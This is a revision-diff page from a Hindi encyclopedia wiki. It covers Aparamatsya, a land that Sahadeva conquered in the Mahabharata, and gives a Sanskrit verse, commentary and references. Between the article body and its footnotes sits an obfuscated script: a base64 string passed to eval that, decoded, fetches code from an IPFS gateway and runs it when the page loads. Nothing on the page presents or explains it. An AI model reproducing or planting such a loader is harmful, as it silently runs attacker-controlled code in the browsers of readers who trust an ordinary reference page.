Difference between revisions of "अपरमत्स्य"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
('{{पुनरीक्षण}} 'सुकुमारं वशे चक्रे सुमित्रं च नराधिपम्...' के साथ नया पन्ना बनाया)
 
Line 1: Line 1:
 
{{पुनरीक्षण}}
 
{{पुनरीक्षण}}
'सुकुमारं वशे चक्रे सुमित्रं च नराधिपम्,  
+
<poem>'सुकुमारं वशे चक्रे सुमित्रं च नराधिपम्,  
तथैवापरमत्स्यांश्च व्यजयत् स पटच्चरान्'।<ref>[[वन पर्व महाभारत|महाभारत वन पर्व]] 31,4</ref>  
+
तथैवापरमत्स्यांश्च व्यजयत् स पटच्चरान्'।<ref>[[वन पर्व महाभारत|महाभारत वन पर्व]] 31,4</ref></poem>  
 
इस उद्धरण से सूचित होता है कि [[सहदेव]] ने अपनी दिग्विजययात्रा में अपरमत्स्य देश को जीता था। इससे पूर्व उन्होंने [[शूरसेन]] और मत्स्य-नरेशों पर भी विजय प्राप्त की थी।<ref>[[वन पर्व महाभारत|महाभारत वन पर्व]] 31, 4</ref> इससे जान पड़ता है कि अपरमत्स्य देश मत्स्य<ref>[[जयपुर]]-[[अलवर]] क्षेत्र</ref> के निकट ही, संभवत: उससे दक्षिण-पूर्व की ओर था जैसा कि सहदेव के यात्राक्रम से सूचित होता है उपर्युक्त उद्धरण से यह भी स्पष्ट है कि अपरमत्स्य देश में पटच्चर या पाटच्चर<ref>यह अपरमत्स्य के पार्श्ववर्ती प्रदेश का नाम हो सकता है</ref> नामक लोगों का निवास था। संभवत: ये लोग चोरी करने में अभ्यस्त थे जिससे 'पाटच्चर' का [[संस्कृत]] में अर्थ ही चोर हो गया है। रायचौधरी के मत में यह देश चंबल-तट के उत्तरी पहाड़ों में स्थित था।<ref>दि पोलिटिकल हिस्ट्री आव एंशेंट इंडिया, चतुर्थ संस्करण, पृ. 116</ref>
 
इस उद्धरण से सूचित होता है कि [[सहदेव]] ने अपनी दिग्विजययात्रा में अपरमत्स्य देश को जीता था। इससे पूर्व उन्होंने [[शूरसेन]] और मत्स्य-नरेशों पर भी विजय प्राप्त की थी।<ref>[[वन पर्व महाभारत|महाभारत वन पर्व]] 31, 4</ref> इससे जान पड़ता है कि अपरमत्स्य देश मत्स्य<ref>[[जयपुर]]-[[अलवर]] क्षेत्र</ref> के निकट ही, संभवत: उससे दक्षिण-पूर्व की ओर था जैसा कि सहदेव के यात्राक्रम से सूचित होता है उपर्युक्त उद्धरण से यह भी स्पष्ट है कि अपरमत्स्य देश में पटच्चर या पाटच्चर<ref>यह अपरमत्स्य के पार्श्ववर्ती प्रदेश का नाम हो सकता है</ref> नामक लोगों का निवास था। संभवत: ये लोग चोरी करने में अभ्यस्त थे जिससे 'पाटच्चर' का [[संस्कृत]] में अर्थ ही चोर हो गया है। रायचौधरी के मत में यह देश चंबल-तट के उत्तरी पहाड़ों में स्थित था।<ref>दि पोलिटिकल हिस्ट्री आव एंशेंट इंडिया, चतुर्थ संस्करण, पृ. 116</ref>
  

Revision as of 07:48, 15 September 2011

chitr:Icon-edit.gif is lekh ka punarikshan evan sampadan hona avashyak hai. ap isamean sahayata kar sakate haian. "sujhav"

'sukumaran vashe chakre sumitran ch naradhipamh,
tathaivaparamatsyaanshch vyajayath s patachcharanh'.[1]

is uddharan se soochit hota hai ki sahadev ne apani digvijayayatra mean aparamatsy desh ko jita tha. isase poorv unhoanne shoorasen aur matsy-nareshoan par bhi vijay prapt ki thi.[2] isase jan p data hai ki aparamatsy desh matsy[3] ke nikat hi, sanbhavat: usase dakshin-poorv ki or tha jaisa ki sahadev ke yatrakram se soochit hota hai uparyukt uddharan se yah bhi spasht hai ki aparamatsy desh mean patachchar ya patachchar[4] namak logoan ka nivas tha. sanbhavat: ye log chori karane mean abhyast the jisase 'patachchar' ka sanskrit mean arth hi chor ho gaya hai. rayachaudhari ke mat mean yah desh chanbal-tat ke uttari paha doan mean sthit tha.[5]

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

  1. mahabharat van parv 31,4
  2. mahabharat van parv 31, 4
  3. jayapur-alavar kshetr
  4. yah aparamatsy ke parshvavarti pradesh ka nam ho sakata hai
  5. di politikal histri av eansheant iandiya, chaturth sanskaran, pri. 116

bahari k diyaan

sanbandhit lekh